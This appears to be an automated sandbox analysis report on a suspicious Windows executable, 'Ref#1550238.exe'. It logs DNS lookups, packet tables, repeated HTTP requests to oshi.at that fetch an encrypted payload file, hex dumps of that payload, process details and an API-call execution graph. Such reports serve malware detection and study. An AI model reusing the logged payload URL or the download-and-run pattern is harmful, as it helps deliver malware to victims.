                                                    Dec 3, 2024 15:12:13.532289028 CET49995443192.168.2.75.253.86.15
                                                    Dec 3, 2024 15:12:13.532562971 CET49995443192.168.2.75.253.86.15
                                                    Dec 3, 2024 15:12:13.532577991 CET443499955.253.86.15192.168.2.7
                                                    Dec 3, 2024 15:12:15.357887983 CET443499955.253.86.15192.168.2.7
                                                    Dec 3, 2024 15:12:15.359235048 CET49995443192.168.2.75.253.86.15
                                                    Dec 3, 2024 15:12:15.384819031 CET49995443192.168.2.75.253.86.15
                                                    Dec 3, 2024 15:12:15.384851933 CET443499955.253.86.15192.168.2.7
                                                    Dec 3, 2024 15:12:15.385248899 CET443499955.253.86.15192.168.2.7
                                                    Dec 3, 2024 15:12:15.391361952 CET49995443192.168.2.75.253.86.15
                                                    Dec 3, 2024 15:12:15.435343981 CET443499955.253.86.15192.168.2.7
                                                    Dec 3, 2024 15:12:24.396898031 CET49995443192.168.2.75.253.86.15
                                                    Dec 3, 2024 15:12:24.397008896 CET443499955.253.86.15192.168.2.7
                                                    Dec 3, 2024 15:12:24.397058010 CET49995443192.168.2.75.253.86.15
                                                    Dec 3, 2024 15:12:24.398858070 CET49996443192.168.2.75.253.86.15
                                                    Dec 3, 2024 15:12:24.398893118 CET443499965.253.86.15192.168.2.7
                                                    Dec 3, 2024 15:12:24.398978949 CET49996443192.168.2.75.253.86.15
                                                    Dec 3, 2024 15:12:24.399684906 CET49996443192.168.2.75.253.86.15
                                                    Dec 3, 2024 15:12:24.399703979 CET443499965.253.86.15192.168.2.7
                                                    Dec 3, 2024 15:12:26.264415979 CET443499965.253.86.15192.168.2.7
                                                    Dec 3, 2024 15:12:26.264489889 CET49996443192.168.2.75.253.86.15
                                                    Dec 3, 2024 15:12:26.434020996 CET49996443192.168.2.75.253.86.15
                                                    Dec 3, 2024 15:12:26.438958883 CET49997443192.168.2.75.253.86.15
                                                    Dec 3, 2024 15:12:26.439024925 CET443499975.253.86.15192.168.2.7
                                                    Dec 3, 2024 15:12:26.439095974 CET49997443192.168.2.75.253.86.15
                                                    Dec 3, 2024 15:12:26.439376116 CET49997443192.168.2.75.253.86.15
                                                    Dec 3, 2024 15:12:26.439398050 CET443499975.253.86.15192.168.2.7
                                                    Dec 3, 2024 15:12:28.259754896 CET443499975.253.86.15192.168.2.7
                                                    Dec 3, 2024 15:12:28.259826899 CET49997443192.168.2.75.253.86.15
                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Dec 3, 2024 15:08:21.122968912 CET5527253192.168.2.71.1.1.1
                                                    Dec 3, 2024 15:08:21.444981098 CET53552721.1.1.1192.168.2.7
                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                    Dec 3, 2024 15:08:21.122968912 CET192.168.2.71.1.1.10xb2d5Standard query (0)oshi.atA (IP address)IN (0x0001)false
                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                    Dec 3, 2024 15:08:21.444981098 CET1.1.1.1192.168.2.70xb2d5No error (0)oshi.at5.253.86.15A (IP address)IN (0x0001)false
                                                    Dec 3, 2024 15:08:21.444981098 CET1.1.1.1192.168.2.70xb2d5No error (0)oshi.at194.15.112.248A (IP address)IN (0x0001)false
                                                    • oshi.at
                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    0192.168.2.7497085.253.86.154437480C:\Users\user\Desktop\Ref#1550238.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-12-03 14:08:23 UTC61OUTGET /EqqP HTTP/1.1
                                                    Host: oshi.at
                                                    Connection: Keep-Alive
                                                    2024-12-03 14:09:13 UTC316INHTTP/1.1 200 OK
                                                    Server: nginx
                                                    Date: Tue, 03 Dec 2024 14:09:12 GMT
                                                    Content-Type: application/octet-stream
                                                    Content-Length: 997384
                                                    Connection: close
                                                    Last-Modified: Mon, 02 Dec 2024 21:59:34 GMT
                                                    Accept-Ranges: bytes
                                                    ETag: "862892d4964a747c945b938d4d1a2260"
                                                    Content-Disposition: attachment; filename=RFmZ.dat
                                                    2024-12-03 14:09:13 UTC3767INData Raw: f0 26 42 0b 3e ae 98 e4 2d 17 eb 8c df ec 2d d5 dd e1 0b fa 29 d3 5d 0e 65 6e e4 ec b0 a8 40 2a 1b 6f 75 d7 37 ba 1e e0 0c d7 bf 58 bb fd 9b 53 85 57 41 d1 26 c7 eb 31 cf 0d ea 9b 9a 87 aa 0c 90 bd f2 60 6d ca 41 bf 19 96 d0 f4 ef 4a 24 c8 5c 26 69 b3 46 9a d6 d5 d7 cd b8 e6 9e 5e 34 b1 10 8f bb 6d 29 03 21 d2 87 a2 d2 03 13 fa f8 5b db 79 62 77 7c c6 fe ec 0f d1 8e 21 ae bc 87 36 22 56 6a dc d7 0a f5 7e 89 32 0c 1b 92 7e 82 e3 4d 5b 00 6d 0f 9c 78 65 e6 9c 11 e6 a7 ca de 09 0f 33 c5 35 aa c8 79 51 f3 a5 b7 8f 76 e7 8b 3c 40 1d 70 cb d0 b2 0f e4 46 7b e0 08 28 63 00 58 fb 15 f6 26 8d 29 77 9b ec 5d 6b 34 19 e3 dd 58 6e 1b 85 37 b4 13 75 03 a2 f3 b4 1f 6f 4d 43 c6 64 82 4f da 22 62 af 4c f4 46 e6 4c d6 9d 2d d3 0d fa 87 0b 9f 48 df 5b 3c fa b9 2d 7d b4 95
                                                    Data Ascii: &B>--)]en@*ou7XSWA&1`mAJ$\&iF^4m)![ybw|!6"Vj~2~M[mxe35yQv<@pF{(cX&)w]k4Xn7uoMCdO"bLFL-H[<-}
                                                    2024-12-03 14:09:13 UTC4096INData Raw: 5f aa cd 18 36 19 2c 72 e9 46 53 a2 2e 6f 74 11 41 10 87 2e 4d f4 68 39 85 f5 15 28 d6 58 81 d7 fb 85 b3 3b 30 5b 5d c9 c0 3c 61 a3 ae 14 41 2a ba e9 1b d5 55 a6 b5 5c cc 5b 20 2b a6 45 d6 d1 63 01 b6 a5 a9 02 85 af 18 50 4b 22 5c f6 3f f6 24 73 76 ba 9b d8 04 f2 2b e0 c6 bb 5b 4c 19 9a 83 c3 e6 08 7f 0f 1f 1e b4 76 58 ce e0 9e c2 73 6b e6 ae be e5 e3 83 7a 9a 0d ef de 5e 51 25 e4 5f 9b fd 41 ae f0 84 e4 f6 ff 17 c6 ee 25 09 f1 e5 ca 74 20 b9 83 7a 51 a5 16 0a 48 1a 1b 91 9c b1 7a ab 33 5e a6 7c 95 4b 09 7d 29 1f 5c 5a 0c 1b df 29 64 0d 25 6d 3c 64 ca 52 13 82 49 7a 8e 60 4d 6d c7 07 7f 77 8c c6 87 27 1f eb 19 e0 c8 02 0a 7e ca bb 2f 1a 31 bf 9c 7c 89 2d b0 d2 f5 e0 5f f7 87 3d c4 80 7d 03 78 e2 d2 1a 39 ce 0c e4 45 31 68 29 f9 6d 15 55 6a 4f f5 50 76 e5
                                                    Data Ascii: _6,rFS.otA.Mh9(X;0[]<aA*U\[ +EcPK"\?$sv+[LvXskz^Q%_A%t zQHz3^|K})\Z)d%m<dRIz`Mmw'~/1|-_=}x9E1h)mUjOPv
                                                    2024-12-03 14:09:13 UTC4096INData Raw: 7c 89 11 5d 3a 09 74 ad 0d 36 ec 77 a0 bd 81 57 36 03 c3 a6 22 e4 a9 e0 f6 38 6a d3 71 51 70 21 a0 00 fe 7c 60 28 98 d9 57 7a e4 09 d4 d2 de 6a 1a cd 82 57 3c 88 df 15 bc fe b3 6c 0a c5 d0 d5 1b 27 19 61 2a b7 36 c4 1b 47 6b e5 ab 35 35 df 41 dd d4 d7 13 8f 9c 59 70 63 d9 67 d2 48 be bf 98 4e ec 45 94 bc c5 17 5b 84 68 15 9b b0 d4 ca 21 78 6a 9f 85 0d a0 45 d4 4c 42 c6 94 75 ce 9f 6d 2c e7 48 e6 2d 50 37 83 5a 79 c8 f1 5a 27 5c 50 97 69 b0 9b d4 e5 34 8f 63 a5 40 ad fa 06 09 e0 4e 74 67 07 c2 d4 3f c6 40 b3 c6 dc 2d 10 a3 08 41 02 06 fc 17 cb df dc ad ef 87 b1 cd b2 8a 28 4a 19 83 78 85 a3 3f e3 b6 55 77 53 c3 39 f4 dc 46 b8 af b5 00 80 ff 0c 2d 29 b0 ce 98 45 2d 11 f7 34 39 72 36 79 84 98 0c 6a ab 9b 6d e3 0d 8b c2 77 22 4d ba 8b f8 a1 61 7b 6b d9 94 2d
                                                    Data Ascii: |]:t6wW6"8jqQp!|`(WzjW<l'a*6Gk55AYpcgHNE[h!xjELBum,H-P7ZyZ'\Pi4c@Ntg?@-A(Jx?UwS9F-)E-49r6yjmw"Ma{k-
                                                    2024-12-03 14:09:13 UTC1081INData Raw: 3e 5a 7a 03 fd dc cf 82 e2 85 ff 34 e4 c3 e4 81 5d 46 c1 68 2c 55 43 3e 4f 67 5f 3f 1e eb f8 3a cf fb a8 08 1a 87 c2 15 c2 27 5d f3 1e 74 f3 57 5c 7b e6 b5 1e b6 34 98 dc ea 65 6a 02 77 1f bf 9f d6 9d 77 67 cf 04 68 04 e6 0b 44 cc 6c 14 8a c4 31 82 03 1c e0 d5 e6 c1 fe dd 89 24 79 9c bc 38 2c e5 e8 96 90 9d 01 5c 1c 9c 8a 0e 67 6e 96 4a d0 5a 8b 11 0f 17 fe 77 86 19 8e 03 5f c3 f0 ca 20 4f f2 02 33 f5 06 be 8c e7 d1 14 30 8c 2b 67 d8 8d bc 49 f2 77 08 c0 b4 45 17 77 e3 34 8d 02 57 cd ec fd 87 16 f2 88 6d a3 f2 be df af 72 be 01 40 1a ac ac a4 e5 ca 80 e5 9f 5b 77 b7 2a a3 ff 68 d2 ec 68 fd 36 ba 57 80 59 7f 7b d3 75 1b 4f 83 2e 9d a0 32 b6 f9 40 e2 aa cc 5a e0 59 67 ba 97 12 74 32 a2 a2 3e 24 4c 34 5b 7c ac 52 a8 dd f7 31 d9 30 bf 8b 83 de 04 6f 81 12 a5
                                                    Data Ascii: >Zz4]Fh,UC>Og_?:']tW\{4ejwwghDl1$y8,\gnJZw_ O30+gIwEw4Wmr@[w*hh6WY{uO.2@ZYgt2>$L4[|R10o
                                                    2024-12-03 14:09:32 UTC4096INData Raw: 1c 18 31 cc c3 79 54 04 40 2c fd 1c aa be b3 1c e9 79 78 95 54 8a c1 0e 98 f4 ad 2f 95 26 f5 da 31 7f 89 55 76 28 d3 ec 0a 59 b5 76 17 b2 61 58 fd f4 59 13 ef 10 63 dc dd cb ca 2c 57 fb 49 5f dd 41 f3 4d c9 73 ed 75 4a f0 86 a4 c8 04 91 a0 e2 c2 61 5c f1 7d e3 e5 27 b3 2c 8e ec 90 b7 1d 70 29 de 2e f9 dd 8d e8 45 cc 99 1d e8 f2 cd 0a e3 06 fa ac dc 41 9b 01 be b0 2c 19 40 86 88 e1 c4 be 22 14 64 ae d2 66 6d 63 d1 78 a3 b2 32 7e 2a be bd 7c 63 54 09 ba a3 9d 29 fe dc 83 20 3a e3 d9 d9 73 ef cb 69 1d 22 b5 d6 b5 69 e3 01 e5 2e fc 43 b7 7f af 17 08 43 0e 36 21 9c c6 f3 01 bd 5c 6e 98 ba a6 fb 14 1f 18 41 b0 fc a8 1e 7a ad 9a 13 5e 36 91 3e 93 f8 d0 8a 12 5c ef 27 85 15 dd 75 9f 16 b5 7e 0c 58 4d c5 fc ef 3e 5e f2 bf 6d 3f f1 19 3b 20 8c b5 6d ca a6 e2 2c c4
                                                    Data Ascii: 1yT@,yxT/&1Uv(YvaXYc,WI_AMsuJa\}',p).EA,@"dfmcx2~*|cT) :si"i.CC6!\nAz^6>\'u~XM>^m?; m,
                                                    2024-12-03 14:09:32 UTC4096INData Raw: 15 af 8e cb 5d 6d bd 03 2d dc e9 2a 6d 35 a7 bd b3 00 21 22 e7 e9 b0 c2 78 72 46 92 7a d4 e7 73 35 1a 2a 81 0e 33 8a ca ab 62 d1 3f 92 7a dc c4 2c 2e 01 de d5 13 8f 89 a4 8e b5 07 9e 99 ab 25 55 11 07 8e 55 03 61 a4 58 6e fa a9 c9 88 c9 18 b8 74 4a 8c 70 11 cd f6 eb 13 be aa 98 fa 7c b8 ea d2 5c 93 62 16 de 13 78 f8 e0 3d fe 37 f1 5a 75 28 13 61 6d 3a a8 9b db d7 ea 87 b9 bd 86 82 5d d9 77 ac 59 a0 bd 95 88 47 5f 52 95 e7 0f 82 34 d6 d6 34 85 2d 8c 2b e7 2b 77 ac e3 5b f1 d6 9f ad 3b 57 33 31 95 f0 77 b8 d5 24 fe 6c 4e b5 dd 0b 44 4c 09 f9 1a 38 35 31 b3 1e b9 eb 8c fa 3c a5 6e 29 76 b0 67 12 fd ea 23 82 a3 17 4c 82 dd fa c7 20 c7 15 12 52 f3 e6 7b 21 23 83 fe ee 27 a4 80 07 49 49 c4 77 5b 15 c0 8a ec 7d ca cf f8 a2 2c 24 56 c8 1d 86 2b 79 5b 14 70 5a 7e
                                                    Data Ascii: ]m-*m5!"xrFzs5*3b?z,.%UUaXntJp|\bx=7Zu(am:]wYG_R44-++w[;W31w$lNDL851<n)vg#L R{!#'IIw[},$V+y[pZ~
                                                    2024-12-03 14:09:32 UTC4096INData Raw: b3 fa b7 90 b6 61 78 ed 17 1e ef 20 38 eb d1 3a 62 5a 42 23 f4 05 76 8d 97 55 bf 2e 79 1a 56 25 1f 8b 70 00 b3 f4 8b c0 44 52 3b bc 12 19 f2 87 c3 f3 5e fb ec 4c 66 18 9a 0f 97 27 4e 34 9c 95 08 62 7b d6 0a 3c 38 8e 7d 9d 62 c2 75 37 70 33 ad 3c 8e a9 99 d2 5e 28 e9 53 dd 0f 1e fd 50 5b 25 fa da 61 48 de c3 97 eb fd 75 0c ea 6b c3 1a 37 20 4e b9 56 69 74 88 f6 52 e2 5c bd 77 e7 d9 1f cc b8 72 79 da ed cc 26 e2 8d 42 30 23 55 23 89 22 24 2e d0 9f 3b fe 6b 3c 0f 4f a2 5e 68 11 7a 7a 48 3a a8 89 8f 03 5c 21 72 09 1d 4c 05 31 8d b8 d4 48 41 1d 9b a9 bc 1b 60 fd 42 0d bf dd bc 97 29 0a 42 fe 0b b2 ad 50 a2 13 1d bd d7 bb cd 14 8a bb ea b2 47 d9 31 b7 02 e3 37 89 ec 25 cc fd b0 02 1b 03 11 d3 ee ed 9f 31 79 a6 e3 c4 ae 12 05 3b 2a c6 80 9f 1a 4a c1 52 3b 94 81
                                                    Data Ascii: ax 8:bZB#vU.yV%pDR;^Lf'N4b{<8}bu7p3<^(SP[%aHuk7 NVitR\wry&B0#U#"$.;k<O^hzzH:\!rL1HA`B)BPG17%1y;*JR;
                                                    2024-12-03 14:09:33 UTC4096INData Raw: 45 c4 3e b4 fb 96 6d 71 8a 4b 69 4c 22 37 fc ab 52 08 51 a6 b3 57 23 e1 6a 82 fc cf 0c 73 7a 9b 62 92 b8 c1 b0 98 ba b6 d1 56 06 7d 4b 46 94 d3 fb 92 7c 84 09 d7 21 ab 94 17 59 63 c6 c3 8e 97 74 b7 44 6e 20 9a 3d 49 0e bc a7 3f 2f c2 f9 dc 63 eb 6e 7f 26 e0 8c 52 9f d5 6f c4 84 35 af f3 16 94 d0 b0 00 e2 60 91 6b 65 ba 37 10 bc 8f fa 09 7a c3 ad f4 26 b0 e1 42 ff 80 73 a5 38 78 29 9f 18 56 71 bc 03 bb 62 29 3d 87 b3 67 f0 c2 aa ab e1 be 2a 72 16 d1 ad 97 9c 60 12 4a 29 a2 e4 4c 8e 69 f2 ca 9f 5d 5d 2b 2b 1e 0f 16 bd 33 76 7d 9a 4c b0 b5 87 c1 94 b8 36 22 89 b9 54 02 bd 9a f8 ce aa 28 1d 86 21 8d 05 da 7c 8b a6 96 90 84 04 32 45 b0 dd ae c8 58 fd ab d5 64 7c e0 eb 66 29 d9 99 69 aa 8c 16 f0 2a c7 9f 15 a2 4f 6d 54 fc 5f 15 5a 78 37 99 72 59 52 00 63 bd 5d
                                                    Data Ascii: E>mqKiL"7RQW#jszbV}KF|!YctDn =I?/cn&Ro5`ke7z&Bs8x)Vqb)=g*r`J)Li]]++3v}L6"T(!|2EXd|f)i*OmT_Zx7rYRc]
                                                    2024-12-03 14:09:33 UTC4096INData Raw: 07 0c 77 0c 99 37 54 6c 03 14 94 8d b9 6a ac 5c 9d 3a 87 01 c5 e3 30 5e 1a 5e b6 6f f5 05 a9 89 f4 75 b1 e7 13 fe 60 e6 a6 2b fb 74 0d 29 03 8f 4a e3 df 41 c4 96 a9 e4 aa 47 5a d9 a5 6c b4 a6 46 31 3a ad fc ed 88 27 e7 0e a9 78 ea 66 2f 02 ad 86 21 d1 79 24 e4 3f 31 21 fc da cf 7b bb 1a 4f bb 8e 29 1d ad 16 6f 0d dd 43 e5 07 ee 70 49 06 4d 21 dc e4 70 c0 63 76 bf 61 76 94 95 5d 20 33 a4 15 c8 0c bb 79 5c 71 48 26 72 ea a0 05 96 61 e8 c5 cc d1 99 8d 4f 70 03 51 28 8a 7f df ec cd 25 ef fc 77 17 ca 0c 15 68 7c ae 0e 3b cc 10 d0 00 b1 c4 1d 18 de 64 67 d3 79 02 b6 48 a7 6c d7 1b 21 75 01 94 f7 6f fa 5f 4a cf 85 e1 5e 22 60 6d a2 32 96 68 2e 3f 62 3c d3 ae 29 31 68 87 0c 9e 3e 39 98 f5 81 d2 8c 90 65 61 f9 e4 78 51 99 de db 79 5a e5 af a5 7f 16 1e c4 b0 50 2a
                                                    Data Ascii: w7Tlj\:0^^ou`+t)JAGZlF1:'xf/!y$?1!{O)oCpIM!pcvav] 3y\qH&raOpQ(%wh|;dgyHl!uo_J^"`m2h.?b<)1h>9eaxQyZP*
                                                    2024-12-03 14:09:33 UTC4096INData Raw: 8d 77 a0 68 56 af 29 12 88 4c d0 77 aa c6 5b 9a ad 51 5c fb 42 ce b0 70 e0 f9 d9 90 a1 36 16 76 c3 89 5a 09 93 c2 ac e1 10 11 38 f9 36 f1 9b 6f 38 0b 7f 5e b0 f1 cc 88 70 53 fa 77 14 2f 58 0e a6 33 f9 25 e1 69 73 fe 5f b8 1a ad 01 9f 5c 96 06 ff c1 c5 3f b6 51 56 4a 92 01 e7 f7 b7 b0 80 8f 8b a7 7e 04 a5 fa 3d 36 67 3f 9b 39 9c 25 a4 ca 1c 59 cc 1c b2 cc e6 d9 f1 64 71 4a cf 12 8f 8a 9e 5f 2f be ab 43 00 dd 25 b3 09 c8 73 5f c8 a2 50 60 6f 4d 4a 39 0f cd 4f f2 65 5b 0b 24 0a 0d ef 08 9e 63 fd 56 9c 53 95 d5 c0 75 58 a1 d5 4d 56 03 a4 67 eb 6f ea 95 35 01 5c c6 5e 7e c8 26 5a 82 c7 ee 5d 09 ef 19 40 ee 6a 7f 0c e9 89 62 8a ae 71 93 f3 45 13 a0 ff b0 72 fe 07 76 0d 25 ef 37 21 87 89 5d 5e c9 de 7c d5 32 a2 ba a7 ee 62 67 51 91 15 1b 39 2e 90 2c 8f 43 09 5f
                                                    Data Ascii: whV)Lw[Q\Bp6vZ86o8^pSw/X3%is_\?QVJ~=6g?9%YdqJ_/C%s_P`oMJ9Oe[$cVSuXMVgo5\^~&Z]@jbqErv%7!]^|2bgQ9.,C_


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    1192.168.2.7498965.253.86.154437480C:\Users\user\Desktop\Ref#1550238.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-12-03 14:09:52 UTC37OUTGET /EqqP HTTP/1.1
                                                    Host: oshi.at


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    2192.168.2.7499275.253.86.154437480C:\Users\user\Desktop\Ref#1550238.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-12-03 14:10:05 UTC37OUTGET /EqqP HTTP/1.1
                                                    Host: oshi.at


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    3192.168.2.7499385.253.86.154437480C:\Users\user\Desktop\Ref#1550238.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-12-03 14:10:10 UTC37OUTGET /EqqP HTTP/1.1
                                                    Host: oshi.at


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    4192.168.2.7499655.253.86.154437480C:\Users\user\Desktop\Ref#1550238.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-12-03 14:10:22 UTC37OUTGET /EqqP HTTP/1.1
                                                    Host: oshi.at


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    5192.168.2.7499835.253.86.154437480C:\Users\user\Desktop\Ref#1550238.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-12-03 14:10:30 UTC37OUTGET /EqqP HTTP/1.1
                                                    Host: oshi.at


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    6192.168.2.7499855.253.86.154437480C:\Users\user\Desktop\Ref#1550238.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-12-03 14:10:50 UTC37OUTGET /EqqP HTTP/1.1
                                                    Host: oshi.at


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    7192.168.2.7499865.253.86.154437480C:\Users\user\Desktop\Ref#1550238.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-12-03 14:11:01 UTC37OUTGET /EqqP HTTP/1.1
                                                    Host: oshi.at


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    8192.168.2.7499895.253.86.154437480C:\Users\user\Desktop\Ref#1550238.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-12-03 14:11:17 UTC37OUTGET /EqqP HTTP/1.1
                                                    Host: oshi.at


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    9192.168.2.7499905.253.86.154437480C:\Users\user\Desktop\Ref#1550238.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-12-03 14:11:37 UTC37OUTGET /EqqP HTTP/1.1
                                                    Host: oshi.at


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    10192.168.2.7499935.253.86.154437480C:\Users\user\Desktop\Ref#1550238.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-12-03 14:11:55 UTC37OUTGET /EqqP HTTP/1.1
                                                    Host: oshi.at


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    11192.168.2.7499945.253.86.154437480C:\Users\user\Desktop\Ref#1550238.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-12-03 14:12:10 UTC37OUTGET /EqqP HTTP/1.1
                                                    Host: oshi.at


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    12192.168.2.7499955.253.86.154437480C:\Users\user\Desktop\Ref#1550238.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-12-03 14:12:15 UTC37OUTGET /EqqP HTTP/1.1
                                                    Host: oshi.at


                                                    Click to jump to process

                                                    Click to jump to process

                                                    Click to dive into process behavior distribution

                                                    Target ID:0
                                                    Start time:09:08:20
                                                    Start date:03/12/2024
                                                    Path:C:\Users\user\Desktop\Ref#1550238.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\Desktop\Ref#1550238.exe"
                                                    Imagebase:0xe20000
                                                    File size:348'128 bytes
                                                    MD5 hash:A31BCF203BB60F13DE83211AC9D44D06
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:low
                                                    Has exited:false

                                                    Reset < >

                                                      Execution Graph

                                                      Execution Coverage:9.5%
                                                      Dynamic/Decrypted Code Coverage:100%
                                                      Signature Coverage:0%
                                                      Total number of Nodes:97
                                                      Total number of Limit Nodes:8
                                                      execution_graph 22712 164da60 22713 164daa6 GetCurrentProcess 22712->22713 22715 164daf8 GetCurrentThread 22713->22715 22718 164daf1 22713->22718 22716 164db35 GetCurrentProcess 22715->22716 22717 164db2e 22715->22717 22719 164db6b GetCurrentThreadId 22716->22719 22717->22716 22718->22715 22721 164dbc4 22719->22721 22722 164d540 22723 164d54d 22722->22723 22724 164d587 22723->22724 22726 164bd80 22723->22726 22727 164bd8b 22726->22727 22728 164e2a0 22727->22728 22730 164d73c 22727->22730 22731 164d747 22730->22731 22735 56f01b8 22731->22735 22741 56f01a0 22731->22741 22732 164e349 22732->22728 22737 56f02ea 22735->22737 22738 56f01e9 22735->22738 22736 56f01f5 22736->22732 22737->22732 22738->22736 22747 56f0eda 22738->22747 22751 56f0ee8 22738->22751 22742 56f01e9 22741->22742 22744 56f02ea 22741->22744 22743 56f01f5 22742->22743 22745 56f0eda 2 API calls 22742->22745 22746 56f0ee8 2 API calls 22742->22746 22743->22732 22744->22732 22745->22744 22746->22744 22748 56f0ee8 22747->22748 22749 56f0fc2 22748->22749 22755 56f1cb1 22748->22755 22752 56f0f13 22751->22752 22753 56f0fc2 22752->22753 22754 56f1cb1 2 API calls 22752->22754 22754->22753 22756 56f1cdf 22755->22756 22760 56f1e05 22756->22760 22764 56f1e10 22756->22764 22761 56f1e78 CreateWindowExW 22760->22761 22763 56f1f34 22761->22763 22765 56f1e78 CreateWindowExW 22764->22765 22767 56f1f34 22765->22767 22768 138d01c 22769 138d034 22768->22769 22770 138d08e 22769->22770 22775 56f1fc8 22769->22775 22780 56f2d18 22769->22780 22786 56f2d28 22769->22786 22792 56f1fb8 22769->22792 22776 56f1fee 22775->22776 22778 56f2d28 2 API calls 22776->22778 22779 56f2d18 2 API calls 22776->22779 22777 56f200f 22777->22770 22778->22777 22779->22777 22781 56f2d55 22780->22781 22782 56f2d87 22781->22782 22797 56f32b8 22781->22797 22801 56f32a8 22781->22801 22805 56f3384 22781->22805 22788 56f2d55 22786->22788 22787 56f2d87 22788->22787 22789 56f32a8 2 API calls 22788->22789 22790 56f32b8 2 API calls 22788->22790 22791 56f3384 2 API calls 22788->22791 22789->22787 22790->22787 22791->22787 22793 56f1fee 22792->22793 22795 56f2d28 2 API calls 22793->22795 22796 56f2d18 2 API calls 22793->22796 22794 56f200f 22794->22770 22795->22794 22796->22794 22799 56f32cc 22797->22799 22798 56f3358 22798->22782 22810 56f3370 22799->22810 22803 56f32cc 22801->22803 22802 56f3358 22802->22782 22804 56f3370 2 API calls 22803->22804 22804->22802 22806 56f3342 22805->22806 22807 56f3392 22805->22807 22809 56f3370 2 API calls 22806->22809 22808 56f3358 22808->22782 22809->22808 22811 56f3381 22810->22811 22813 56f453b 22810->22813 22811->22798 22817 56f4550 22813->22817 22821 56f4560 22813->22821 22814 56f454a 22814->22811 22818 56f45a2 22817->22818 22820 56f45a9 22817->22820 22819 56f45fa CallWindowProcW 22818->22819 22818->22820 22819->22820 22820->22814 22822 56f45a2 22821->22822 22824 56f45a9 22821->22824 22823 56f45fa CallWindowProcW 22822->22823 22822->22824 22823->22824 22824->22814 22827 164b2d0 22830 164b3b7 22827->22830 22828 164b2df 22831 164b3fc 22830->22831 22832 164b3d9 22830->22832 22831->22828 22832->22831 22833 164b600 GetModuleHandleW 22832->22833 22834 164b62d 22833->22834 22834->22828 22825 164dca8 DuplicateHandle 22826 164dd3e 22825->22826
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3742802422.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_56f0000_Ref#1550238.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: ebf2d0581cc6d96fbee9bf3a0f22be143d646e8b225b7bd38fbd86d8083327d7
                                                      • Instruction ID: d304678f96468f0694a506c9903ffb9191763813711b6138f77bff28b6974499
                                                      • Opcode Fuzzy Hash: ebf2d0581cc6d96fbee9bf3a0f22be143d646e8b225b7bd38fbd86d8083327d7
                                                      • Instruction Fuzzy Hash: 15914A31F04204CFD714CFA9D484BBAB3B3FB84302F54C566D60A9BA94E774A986CB61
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3742802422.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_56f0000_Ref#1550238.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a92c17f859b55213dbfd3c117f075a08048932ef262c053850bd309826486405
                                                      • Instruction ID: 3b68c513be65c0d06d9c6f4b971f83bd5586cd793f8c4166beadd6678b1f211c
                                                      • Opcode Fuzzy Hash: a92c17f859b55213dbfd3c117f075a08048932ef262c053850bd309826486405
                                                      • Instruction Fuzzy Hash: C4915B30F04204CFD714CFA9D484BBAB7B3FB84302F54C566D61A9BA94E734A986CB61
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3742802422.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_56f0000_Ref#1550238.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e8d1f0d539a4b401760ed37ce3305e2105194c962c78c1d38126d2f6baede1bf
                                                      • Instruction ID: 5db67361b72b5bd32a5218e88fd885de031108d7d884b58eb6e68d8b7d2961d6
                                                      • Opcode Fuzzy Hash: e8d1f0d539a4b401760ed37ce3305e2105194c962c78c1d38126d2f6baede1bf
                                                      • Instruction Fuzzy Hash: 16813CB4E18218CFE714CF58D488BA9B3B2FB88310F1185A5E5069BB99C774EC96DF40

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
